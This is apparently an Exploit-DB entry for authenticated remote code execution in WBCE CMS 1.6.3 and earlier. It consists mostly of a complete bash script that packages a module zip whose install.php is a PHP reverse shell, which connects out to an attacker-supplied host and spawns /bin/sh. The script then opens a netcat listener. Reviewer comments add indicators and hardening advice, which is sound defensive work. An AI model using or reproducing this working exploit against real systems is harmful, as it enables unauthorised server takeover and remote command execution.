
WBCE CMS 1.6.3 - Authenticated Remote Code Execution (RCE)

🗓️ 06 Apr 2025 00:00:00 | Reported by Swammers8 | Type: exploitdb | 🔗 www.exploit-db.com | 👁 311 Views

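Authenticated remote code execution in WBCE CMS 1.6.3 and earlier. A user who can log in to the admin panel and install a module archive gets the module's install.php executed during installation, so module-install rights amount to code execution in the web server's PHP context.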

Code
# Exploit Title: WBCE CMS <= v1.6.3 Authenticated Remote Code Execution (RCE)
# Date: 3/22/2025
# Exploit Author: Swammers8
# Vendor Homepage: https://wbce-cms.org/
# Software Link: https://github.com/WBCE/WBCE_CMS
# Version: 1.6.3 and prior
# Tested on: Ubuntu 24.04.2 LTS
# YouTube Demonstration: https://youtu.be/Dhg5gRe9Dzs?si=-WQoiWU1yqvYNz1e
# Github: https://github.com/Swammers8/WBCE-v1.6.3-Authenticated-RCE

#!/bin/bash

# Make a zip file exploit
# Start netcat listener

# Argument gate: the script needs exactly two positional arguments (callback
# host and port). With any other count it prints the description and usage
# below and exits with status 1.
# The description states the preconditions of the issue: valid admin
# credentials are required, and the code runs at module install time.
if [[ $# -ne 2 ]]; then
	echo "[*] Description:"
	echo "[*] This is an Authenticated RCE exploit for WBCE CMS version <= 1.6.3"
	echo "[*] It will create an infected module .zip file and start a netcat listener."
	echo "[*] Once the zip is created, you will have to login to the admin page"
	echo "[*] to upload and install the module, which will immediately run the shell"
	echo "[*] Shell taken from: https://github.com/pentestmonkey/php-reverse-shell/tree/master"
	echo "[!] Usage:"
	echo "[*] $0 <lhost> <lport>"
	exit 1
fi

# Dependency check: abort with status 1 when `which nc` prints nothing,
# i.e. no netcat binary is found on PATH.
if [ -z "$(which nc)" ]; then
	echo "[!] Netcat is not installed."
	exit 1 
fi

# Keep the two arguments under readable names. They are not validated here and
# are later expanded by the shell into the generated install.php.
ip=$1
port=$2

# Clear leftovers from an earlier run in the current working directory, then
# create a fresh staging directory for the module files.
rm -rf shellModule.zip
rm -rf shellModule
mkdir shellModule

echo [*] Crafting Payload

# Write the module metadata file info.php into the staging directory.
# The heredoc delimiter is unquoted, so each PHP variable is written as `\$name`
# to keep the shell from expanding it; the file receives a literal `$name`.
# NOTE(review): the metadata values are fixed strings in this PoC (directory
# 'modshell', name 'Reverse Shell', author 'Swammers8', version '1.3.3.7').
# They can be used as indicators when auditing the installed-module list or the
# modules directory, but they are trivially changeable and their absence proves
# nothing.
cat <<EOF > shellModule/info.php
<?php
/**
 *
 * @category        modules
 * @package         Reverse Shell
 * @author          Swammers8
 * @link                        https://swammers8.github.io/
 * @license         http://www.gnu.org/licenses/gpl.html
 * @platform        example.com
 * @requirements    PHP 5.6 and higher
 * @version         1.3.3.7
 * @lastmodified    May 22 2025
 *
 *
 */

\$module_directory               = 'modshell';
\$module_name                    = 'Reverse Shell';
\$module_function                = 'page';
\$module_version                 = '1.3.3.7';
\$module_platform                = '2.10.x';

\$module_author                  = 'Swammers8';
\$module_license                 = 'GNU General Public License';
\$module_description     = 'This module is a backdoor';

?>
EOF

# Write install.php into the staging directory. Per this script's usage text,
# installing the module is what makes the CMS run this file; the installer code
# itself is not shown on this page.
# The body is credited in the usage text to pentestmonkey's php-reverse-shell.
# Only `$ip` and `$port` are left unescaped, so the shell substitutes the two
# script arguments; every other `$` is escaped and reaches the file literally.
#
# What the generated PHP does, as visible below:
#   - lifts the execution time limit, then forks and calls posix_setsid() when
#     pcntl_fork exists (otherwise it continues in the request process);
#   - chdir("/") and umask(0);
#   - opens an outbound TCP connection with fsockopen() (30 s timeout);
#   - starts `uname -a; w; id; /bin/sh -i` through proc_open() with three pipes;
#   - relays bytes between the socket and the pipes in a stream_select() loop
#     until either side reaches EOF, then closes everything.
# printit() reads $daemon without declaring it global, so inside the function
# it is unset and the messages are always printed. Strings such as
# "Successfully opened reverse shell to" may therefore appear in installer
# output (presumably the HTTP response; confirm against the CMS).
#
# NOTE(review), defender view: the observable behaviour is a PHP/web-server
# process making an outbound TCP connection and spawning /bin/sh. Egress
# filtering on the web host, PHP's disable_functions for proc_open, fsockopen
# and the pcntl functions where the application does not need them, and
# limiting who holds module-install rights each reduce the impact.
cat <<EOF > shellModule/install.php
<?php
set_time_limit (0);
\$VERSION = "1.0";
\$ip = '$ip';  // CHANGE THIS
\$port = $port;       // CHANGE THIS
\$chunk_size = 1400;
\$write_a = null;
\$error_a = null;
\$shell = 'uname -a; w; id; /bin/sh -i';
\$daemon = 0;
\$debug = 0;

if (function_exists('pcntl_fork')) {
	\$pid = pcntl_fork();
	if (\$pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if (\$pid) {
		exit(0);  // Parent exits
	}

	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	\$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);


\$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30);
if (!\$sock) {
	printit("\$errstr (\$errno)");
	exit(1);
}

\$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

\$process = proc_open(\$shell, \$descriptorspec, \$pipes);

if (!is_resource(\$process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

stream_set_blocking(\$pipes[0], 0);
stream_set_blocking(\$pipes[1], 0);
stream_set_blocking(\$pipes[2], 0);
stream_set_blocking(\$sock, 0);

printit("Successfully opened reverse shell to \$ip:\$port");

while (1) {
	if (feof(\$sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	if (feof(\$pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	\$read_a = array(\$sock, \$pipes[1], \$pipes[2]);
	\$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);

	if (in_array(\$sock, \$read_a)) {
		if (\$debug) printit("SOCK READ");
		\$input = fread(\$sock, \$chunk_size);
		if (\$debug) printit("SOCK: \$input");
		fwrite(\$pipes[0], \$input);
	}

	if (in_array(\$pipes[1], \$read_a)) {
		if (\$debug) printit("STDOUT READ");
		\$input = fread(\$pipes[1], \$chunk_size);
		if (\$debug) printit("STDOUT: \$input");
		fwrite(\$sock, \$input);
	}

	if (in_array(\$pipes[2], \$read_a)) {
		if (\$debug) printit("STDERR READ");
		\$input = fread(\$pipes[2], \$chunk_size);
		if (\$debug) printit("STDERR: \$input");
		fwrite(\$sock, \$input);
	}
}

fclose(\$sock);
fclose(\$pipes[0]);
fclose(\$pipes[1]);
fclose(\$pipes[2]);
proc_close(\$process);

function printit (\$string) {
	if (!\$daemon) {
		print "\$string\n";
	}
}

?> 
EOF

# Package the staging directory as shellModule.zip and delete the directory,
# leaving only the archive in the current working directory.
echo [*] Zipping to shellModule.zip
zip -r shellModule.zip shellModule
rm -rf shellModule
# The upload and install step is manual and needs an authenticated admin
# session; this script does not contact the CMS itself.
echo [*] Please login to the WBCE admin panel to upload and install the module
echo [*] Starting listener

# Blocks here until the netcat session ends.
nc -lvnp $port

echo
echo
echo "[*] Done!"
# The reminder below implies the module stays installed on the CMS after the
# session ends. NOTE(review): for incident response, a module named
# 'Reverse Shell' (directory 'modshell' per info.php) left in the module list is
# a persistent artifact worth checking for.
echo "[*] Make sure to uninstall the module named 'Reverse Shell' in the module page"
